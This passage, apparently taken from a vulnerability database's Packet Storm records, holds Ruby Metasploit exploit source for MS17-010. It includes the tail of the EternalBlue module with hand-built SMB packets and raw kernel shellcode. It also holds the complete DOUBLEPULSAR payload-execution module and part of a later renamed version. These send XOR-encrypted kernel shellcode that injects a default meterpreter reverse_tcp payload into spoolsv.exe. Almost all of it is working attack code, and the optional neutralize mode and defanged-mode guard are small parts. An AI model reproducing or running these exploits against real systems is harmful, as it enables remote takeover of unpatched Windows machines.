\npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\xa0\" # NT Trans \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # 
Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n \npkt << \"\\x14\" # Word Count \npkt << \"\\x01\" # Max Setup Count \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x1e\\x00\\x00\\x00\" # Total Param Count \npkt << \"\\xd0\\x03\\x01\\x00\" # Total Data Count \npkt << \"\\x1e\\x00\\x00\\x00\" # Max Param Count \npkt << \"\\x00\\x00\\x00\\x00\" # Max Data Count \npkt << \"\\x1e\\x00\\x00\\x00\" # Param Count \npkt << \"\\x4b\\x00\\x00\\x00\" # Param Offset \npkt << \"\\xd0\\x03\\x00\\x00\" # Data Count \npkt << \"\\x68\\x00\\x00\\x00\" # Data Offset \npkt << \"\\x01\" # Setup Count \npkt << \"\\x00\\x00\" # Function <unknown> \npkt << \"\\x00\\x00\" # Unknown NT transaction (0) setup \npkt << \"\\xec\\x03\" # Byte Count \npkt << \"\\x00\" * 0x1f # NT Parameters \n \n# undocumented \npkt << \"\\x01\" \npkt << \"\\x00\" * 0x3cd \n \npkt \nend \n \ndef make_smb1_free_hole_session_packet(flags2, vcnum, native_os) \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x00\\x51\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x73\" # Session Setup AndX \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << flags2 # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\" # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << \"\\x00\\x00\" # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n#pkt << \"\\x00\\x00\" # Reserved \n \npkt << \"\\x0c\" # Word Count \npkt << \"\\xff\" # No further commands \npkt << \"\\x00\" # Reserved \npkt << \"\\x00\\x00\" # AndXOffset \npkt << \"\\x04\\x11\" # Max Buffer 
\npkt << \"\\x0a\\x00\" # Max Mpx Count \npkt << vcnum # VC Number \npkt << \"\\x00\\x00\\x00\\x00\" # Session key \npkt << \"\\x00\\x00\" # Security blob length \npkt << \"\\x00\\x00\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\\x00\\x80\" # Capabilities \npkt << \"\\x16\\x00\" # Byte count \n#pkt << \"\\xf0\" # Security Blob: <MISSING> \n#pkt << \"\\xff\\x00\\x00\\x00\" # Native OS \n#pkt << \"\\x00\\x00\" # Native LAN manager \n#pkt << \"\\x00\\x00\" # Primary domain \npkt << native_os \npkt << \"\\x00\" * 17 # Extra byte params \n \npkt \nend \n \ndef make_smb1_anonymous_login_packet \n# Neither Rex nor RubySMB appear to support Anon login? \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x00\\x88\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x73\" # Session Setup AndX \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\" # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n \npkt << \"\\x0d\" # Word Count \npkt << \"\\xff\" # No further commands \npkt << \"\\x00\" # Reserved \npkt << \"\\x88\\x00\" # AndXOffset \npkt << \"\\x04\\x11\" # Max Buffer \npkt << \"\\x0a\\x00\" # Max Mpx Count \npkt << \"\\x00\\x00\" # VC Number \npkt << \"\\x00\\x00\\x00\\x00\" # Session key \npkt << \"\\x01\\x00\" # ANSI pw length \npkt << \"\\x00\\x00\" # Unicode pw length \npkt << \"\\x00\\x00\\x00\\x00\" # Reserved \npkt << \"\\xd4\\x00\\x00\\x00\" # Capabilities \npkt << \"\\x4b\\x00\" # Byte count \npkt << \"\\x00\" # ANSI pw \npkt << \"\\x00\\x00\" # Account name \npkt << \"\\x00\\x00\" # Domain name \n \n# Windows 2000 2195 \npkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\" \npkt << 
\"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\" \npkt << \"\\x00\\x00\" \n \n# Windows 2000 5.0 \npkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\" \npkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\\x30\\x00\\x00\\x00\" \n \npkt \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \n# ep_thl_b = EPROCESS.ThreadListHead.Blink offset \n# et_alertable = ETHREAD.Alertable offset \n# teb_acp = TEB.ActivationContextPointer offset \n# et_tle = ETHREAD.ThreadListEntry offset \ndef make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle) \nsc = make_kernel_shellcode \nsc << [ring3.length].pack(\"S<\") \nsc << ring3 \nsc \nend \n \ndef make_kernel_shellcode \n# https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm \n# Name: kernel \n# Length: 1019 bytes \n \n#\"\\xcc\"+ \n\"\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\" + \n\"\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\\x00\\x00\\x00\\x48\\x89\\xC2\" + \n\"\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\\x65\\x48\\x89\\x24\\x25\\x10\" + \n\"\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\\x00\\x00\\x50\\x53\\x51\\x52\" + \n\"\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x41\\x54\\x41\\x55\\x41\" + \n\"\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\\x00\\x00\\x00\\x41\\x53\\x6A\" + \n\"\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\\x48\\x81\\xEC\\x58\\x01\\x00\" + \n\"\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\\x89\\x9D\\xC0\\x00\\x00\\x00\" + \n\"\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\\xD0\\x00\\x00\\x00\\x48\\xA1\" + \n\"\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x48\" + \n\"\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x30\\xFB\\xE8\" + 
\n\"\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\" + \n\"\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\\xD9\\x75\\xEC\\x58\\x44\\x8B\" + \n\"\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\\x01\" + \n\"\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\\x5A\\x41\\x58\\x41\\x59\\x41\" + \n\"\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\\x89\\xE5\\x48\\x83\\xEC\\x20\" + \n\"\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\\xFF\\x31\\xC9\\x51\\x51\\x51\" + \n\"\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\\x5A\\x48\\x83\\xEC\\x20\\x41\" + \n\"\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\\x48\\x89\\xEC\\x5D\\x41\\x5F\" + \n\"\\x5E\\xC3\" \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142548/ms17_010_eternalblue.rb.txt"}, {"lastseen": "2019-10-02T22:58:30", "description": "", "cvss3": {}, "published": "2019-10-01T00:00:00", "type": "packetstorm", "title": "DOUBLEPULSAR Payload Execution / Neutralization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2019-10-01T00:00:00", "id": "PACKETSTORM:154690", "href": "https://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::SMB::Client \n \nMAX_SHELLCODE_SIZE = 4096 \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization', \n'Description' => %q{ \nThis module executes a Metasploit payload against the Equation Group's 
\nDOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. \n \nWhile this module primarily performs code execution against the implant, \nthe \"Neutralize implant\" target allows you to disable the implant. \n}, \n'Author' => [ \n'Equation Group', # DOUBLEPULSAR implant \n'Shadow Brokers', # Equation Group dump \n'zerosum0x0', # DOPU analysis and detection \n'Luke Jennings', # DOPU analysis and detection \n'wvu', # Metasploit module and arch detection \n'Jacob Robles' # Metasploit module and RCE help \n], \n'References' => [ \n['MSB', 'MS17-010'], \n['CVE', '2017-0143'], \n['CVE', '2017-0144'], \n['CVE', '2017-0145'], \n['CVE', '2017-0146'], \n['CVE', '2017-0147'], \n['CVE', '2017-0148'], \n['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'], \n['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'], \n['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'], \n['URL', 'https://github.com/countercept/doublepulsar-detection-script'], \n['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'], \n['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'] \n], \n'DisclosureDate' => '2017-04-14', \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => ARCH_X64, \n'Privileged' => true, \n'Payload' => { \n'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size, \n'DisableNops' => true \n}, \n'Targets' => [ \n['Execute payload', {}], \n['Neutralize implant', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n}, \n'Notes' => { \n'AKA' => ['DOUBLEPULSAR'], \n'RelatedModules' => [ \n'auxiliary/scanner/smb/smb_ms17_010', \n'exploit/windows/smb/ms17_010_eternalblue' \n], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION] \n} \n)) \n \nregister_advanced_options([ 
\nOptBool.new('DefangedMode', [true, 'Run in defanged mode', true]), \nOptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe']) \n]) \nend \n \nOPCODES = { \nping: 0x23, \nexec: 0xc8, \nkill: 0x77 \n} \n \nSTATUS_CODES = { \nnot_detected: 0x00, \nsuccess: 0x10, \ninvalid_params: 0x20, \nalloc_failure: 0x30 \n} \n \ndef calculate_doublepulsar_status(m1, m2) \nSTATUS_CODES.key(m2.to_i - m1.to_i) \nend \n \n# algorithm to calculate the XOR Key for DoublePulsar knocks \ndef calculate_doublepulsar_xor_key(s) \nx = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))) \nx & 0xffffffff # this line was added just to truncate to 32 bits \nend \n \n# The arch is adjacent to the XOR key in the SMB signature \ndef calculate_doublepulsar_arch(s) \ns == 0 ? ARCH_X86 : ARCH_X64 \nend \n \ndef generate_doublepulsar_timeout(op) \nk = SecureRandom.random_bytes(4).unpack('V').first \n0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00 \nend \n \ndef generate_doublepulsar_param(op, body) \ncase OPCODES.key(op) \nwhen :ping, :kill \n\"\\x00\" * 12 \nwhen :exec \nRex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*')) \nend \nend \n \ndef check \nipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\" \n \n@tree_id = do_smb_setup_tree(ipc_share) \nvprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\") \nvprint_status(\"Target OS is #{smb_peer_os}\") \n \nvprint_status('Sending ping to DOUBLEPULSAR') \ncode, signature1, signature2 = do_smb_doublepulsar_pkt \nmsg = 'Host is likely INFECTED with DoublePulsar!' 
\n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \n@xor_key = calculate_doublepulsar_xor_key(signature1) \n@arch = calculate_doublepulsar_arch(signature2) \n \narch_str = \ncase @arch \nwhen ARCH_X86 \n'x86 (32-bit)' \nwhen ARCH_X64 \n'x64 (64-bit)' \nend \n \nvprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\") \nCheckCode::Vulnerable \nwhen :not_detected \nvprint_error('DOUBLEPULSAR not detected or disabled') \nCheckCode::Safe \nelse \nvprint_error('An unknown error occurred') \nCheckCode::Unknown \nend \nend \n \ndef exploit \nif datastore['DefangedMode'] \nwarning = <<~EOF \n \n \nAre you SURE you want to execute code against a nation-state implant? \nYou MAY contaminate forensic evidence if there is an investigation. \n \nDisable the DefangedMode option if you have authorization to proceed. \nEOF \n \nfail_with(Failure::BadConfig, warning) \nend \n \n# No ForceExploit because @tree_id and @xor_key are required \nunless check == CheckCode::Vulnerable \nfail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR') \nend \n \ncase target.name \nwhen 'Execute payload' \nunless @xor_key \nfail_with(Failure::NotFound, 'XOR key not found') \nend \n \nif @arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'x86 is not a supported target') \nend \n \nprint_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\") \nshellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName']) \nshellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length) \nvprint_status(\"Total shellcode length: #{shellcode.length} bytes\") \n \nprint_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\") \nxor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode) \n \nprint_status('Sending shellcode to DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode) \nwhen 'Neutralize implant' \nreturn neutralize_implant \nend \n 
\ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Payload execution successful') \nwhen :invalid_params \nfail_with(Failure::BadConfig, 'Invalid parameters were specified') \nwhen :alloc_failure \nfail_with(Failure::PayloadFailed, 'An allocation failure occurred') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nensure \ndisconnect \nend \n \ndef neutralize_implant \nprint_status('Neutralizing DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill]) \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Implant neutralization successful') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nend \n \ndef do_smb_setup_tree(ipc_share) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nsimple.connect(ipc_share) \n \n# return tree \nsimple.shares[ipc_share] \nend \n \ndef do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil) \n# make doublepulsar knock \npkt = make_smb_trans2_doublepulsar(opcode, body) \n \nsock.put(pkt) \nbytes = sock.get_once \n \nreturn unless bytes \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \nreturn pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2'] \nend \n \ndef make_smb_trans2_doublepulsar(opcode, body) \nsetup_count = 1 \nsetup_data = [0x000e].pack('v') \n \nparam = generate_doublepulsar_param(opcode, body) \ndata = param + body.to_s \n \npkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \nbase_offset = pkt.to_s.length + (setup_count * 2) - 4 \nparam_offset = base_offset \ndata_offset = param_offset + param.length \n \npkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 
\npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0xc007 \n \n@multiplex_id = rand(0xffff) \n \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload']['SMB'].v['TreeID'] = @tree_id \npkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id \n \npkt['Payload'].v['ParamCountTotal'] = param.length \npkt['Payload'].v['DataCountTotal'] = body.to_s.length \npkt['Payload'].v['ParamCountMax'] = 1 \npkt['Payload'].v['DataCountMax'] = 0 \npkt['Payload'].v['ParamCount'] = param.length \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataCount'] = body.to_s.length \npkt['Payload'].v['DataOffset'] = data_offset \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup_data \npkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode) \npkt['Payload'].v['Payload'] = data \n \npkt.to_s \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \ndef make_kernel_user_payload(ring3, proc_name) \nsc = make_kernel_shellcode(proc_name) \n \nsc << [ring3.length].pack(\"S<\") \nsc << ring3 \n \nsc \nend \n \ndef generate_process_hash(process) \n# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \nproc_hash = 0 \nprocess << \"\\x00\" \n \nprocess.each_byte do |c| \nproc_hash = ror(proc_hash, 13) \nproc_hash += c \nend \n \n[proc_hash].pack('l<') \nend \n \ndef ror(dword, bits) \n(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF \nend \n \ndef make_kernel_shellcode(proc_name) \n# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \n# Length: 780 bytes \n\"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" + \n\"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" + \n\"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" + \n\"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" 
+ \ngenerate_process_hash(proc_name.upcase) + 
\n\"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\" \nend \n \ndef kernel_shellcode_size \nmake_kernel_shellcode('').length \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/154690/doublepulsar_rce.rb.txt"}, {"lastseen": "2020-02-06T14:50:28", "description": "", "cvss3": {}, "published": "2020-02-04T00:00:00", "type": "packetstorm", "title": "SMB DOUBLEPULSAR Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2020-02-04T00:00:00", "id": "PACKETSTORM:156196", "href": "https://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::SMB::Client \ninclude Msf::Module::Deprecated \n \nmoved_from 'exploit/windows/smb/doublepulsar_rce' \n \nMAX_SHELLCODE_SIZE = 4096 \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SMB DOUBLEPULSAR Remote Code Execution', \n'Description' => %q{ \nThis module executes a Metasploit payload against the Equation Group's \nDOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. \n \nWhile this module primarily performs code execution against the implant, \nthe \"Neutralize implant\" target allows you to disable the implant. 
\n}, \n'Author' => [ \n'Equation Group', # DOUBLEPULSAR implant \n'Shadow Brokers', # Equation Group dump \n'zerosum0x0', # DOPU analysis and detection \n'Luke Jennings', # DOPU analysis and detection \n'wvu', # Metasploit module and arch detection \n'Jacob Robles' # Metasploit module and RCE help \n], \n'References' => [ \n['MSB', 'MS17-010'], \n['CVE', '2017-0143'], \n['CVE', '2017-0144'], \n['CVE', '2017-0145'], \n['CVE', '2017-0146'], \n['CVE', '2017-0147'], \n['CVE', '2017-0148'], \n['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'], \n['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'], \n['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'], \n['URL', 'https://github.com/countercept/doublepulsar-detection-script'], \n['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'], \n['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'] \n], \n'DisclosureDate' => '2017-04-14', # Shadow Brokers leak \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => ARCH_X64, \n'Privileged' => true, \n'Payload' => { \n'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size, \n'DisableNops' => true \n}, \n'Targets' => [ \n['Execute payload (x64)', \n'DefaultOptions' => { \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n], \n['Neutralize implant', \n'DefaultOptions' => { \n'PAYLOAD' => nil # XXX: \"Unset\" generic payload \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['DOUBLEPULSAR'], \n'RelatedModules' => [ \n'auxiliary/scanner/smb/smb_ms17_010', \n'exploit/windows/smb/ms17_010_eternalblue' \n], \n'Stability' => [CRASH_OS_DOWN], \n'Reliability' => [REPEATABLE_SESSION] \n} \n)) \n \nregister_advanced_options([ \nOptBool.new('DefangedMode', [true, 'Run in defanged mode', true]), \nOptString.new('ProcessName', [true, 'Process to inject payload 
into', 'spoolsv.exe']) \n]) \nend \n \nOPCODES = { \nping: 0x23, \nexec: 0xc8, \nkill: 0x77 \n}.freeze \n \nSTATUS_CODES = { \nnot_detected: 0x00, \nsuccess: 0x10, \ninvalid_params: 0x20, \nalloc_failure: 0x30 \n}.freeze \n \ndef calculate_doublepulsar_status(m1, m2) \nSTATUS_CODES.key(m2.to_i - m1.to_i) \nend \n \n# algorithm to calculate the XOR Key for DoublePulsar knocks \ndef calculate_doublepulsar_xor_key(s) \nx = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))) \nx & 0xffffffff # this line was added just to truncate to 32 bits \nend \n \n# The arch is adjacent to the XOR key in the SMB signature \ndef calculate_doublepulsar_arch(s) \ns == 0 ? ARCH_X86 : ARCH_X64 \nend \n \ndef generate_doublepulsar_timeout(op) \nk = SecureRandom.random_bytes(4).unpack1('V') \n0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00 \nend \n \ndef generate_doublepulsar_param(op, body) \ncase OPCODES.key(op) \nwhen :ping, :kill \n\"\\x00\" * 12 \nwhen :exec \nRex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*')) \nend \nend \n \ndef check \nipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\" \n \n@tree_id = do_smb_setup_tree(ipc_share) \nvprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\") \nvprint_status(\"Target OS is #{smb_peer_os}\") \n \nprint_status('Sending ping to DOUBLEPULSAR') \ncode, signature1, signature2 = do_smb_doublepulsar_pkt \nmsg = 'Host is likely INFECTED with DoublePulsar!' 
\n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \n@xor_key = calculate_doublepulsar_xor_key(signature1) \n@arch = calculate_doublepulsar_arch(signature2) \n \narch_str = \ncase @arch \nwhen ARCH_X86 \n'x86 (32-bit)' \nwhen ARCH_X64 \n'x64 (64-bit)' \nend \n \nprint_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\") \nCheckCode::Vulnerable \nwhen :not_detected \nprint_error('DOUBLEPULSAR not detected or disabled') \nCheckCode::Safe \nelse \nprint_error('An unknown error occurred') \nCheckCode::Unknown \nend \nend \n \ndef exploit \nif datastore['DefangedMode'] \nwarning = <<~EOF \n \n \nAre you SURE you want to execute code against a nation-state implant? \nYou MAY contaminate forensic evidence if there is an investigation. \n \nDisable the DefangedMode option if you have authorization to proceed. \nEOF \n \nfail_with(Failure::BadConfig, warning) \nend \n \n# No ForceExploit because @tree_id and @xor_key are required \nunless check == CheckCode::Vulnerable \nfail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR') \nend \n \ncase target.name \nwhen 'Execute payload (x64)' \nunless @xor_key \nfail_with(Failure::NotFound, 'XOR key not found') \nend \n \nif @arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'x86 is not a supported target') \nend \n \nprint_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\") \nshellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName']) \nshellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length) \nvprint_status(\"Total shellcode length: #{shellcode.length} bytes\") \n \nprint_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\") \nxor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode) \n \nprint_status('Sending shellcode to DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode) \nwhen 'Neutralize implant' \nreturn neutralize_implant \nend \n 
\ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Payload execution successful') \nwhen :invalid_params \nfail_with(Failure::BadConfig, 'Invalid parameters were specified') \nwhen :alloc_failure \nfail_with(Failure::PayloadFailed, 'An allocation failure occurred') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nensure \ndisconnect \nend \n \ndef neutralize_implant \nprint_status('Neutralizing DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill]) \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Implant neutralization successful') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nend \n \ndef do_smb_setup_tree(ipc_share) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nsimple.connect(ipc_share) \n \n# return tree \nsimple.shares[ipc_share] \nend \n \ndef do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil) \n# make doublepulsar knock \npkt = make_smb_trans2_doublepulsar(opcode, body) \n \nsock.put(pkt) \nbytes = sock.get_once \n \nreturn unless bytes \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \nreturn pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], 